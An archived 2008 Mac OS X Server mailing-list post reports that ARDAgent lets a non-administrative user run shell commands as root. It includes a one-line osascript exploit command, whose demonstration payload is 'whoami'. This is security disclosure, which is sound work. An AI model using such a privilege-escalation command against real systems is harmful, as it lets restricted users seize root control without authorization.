ARDAgent allows root access for restricted users

Subject: ARDAgent allows root access for restricted users
From: list2 <email@hidden>
Date: Thu, 19 Jun 2008 17:31:17 -0700
Delivered-to: email@hidden
Delivered-to: email@hidden

If you log in as a non-administrative user you can essentially breach security and execute a script as root.

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Interesting that I don't hear about this from Apple or anybody.
_______________________________________________
Do not post admin requests to the list. They will be ignored.
Macos-x-server mailing list      (email@hidden)
Help/Unsubscribe/Update your Subscription:
This email sent to email@hidden


Follow-Ups:

Re: ARDAgent allows root access for restricted users
From: Simon Slavin <email@hidden>
Re: ARDAgent allows root access for restricted users
From: Dave Schroeder <email@hidden>
Re: ARDAgent allows root access for restricted users
From: Rusty Zink Myers <email@hidden>


References:  
  >Multiple Wikis? (From: Randall Meadows <email@hidden>)




Prev by Date:
DNS subdomains in Leopard Server Standard config

Next by Date:
Crontab Vs. Lauchd

Previous by thread:
Multiple Wikis?

Next by thread:
Re: ARDAgent allows root access for restricted users

Index(es):

Date
Thread













  
   Home
   Archives
   Terms/Conditions
   Contact
   RSS
   Lists
   About
 






Visit the Apple Store online or at retail locations.

1-800-MY-APPLE
Contact Apple | Terms of Use | Privacy Policy
Copyright © 2011 Apple Inc. All rights reserved.

References:
	>Multiple Wikis? (From: Randall Meadows <email@hidden>)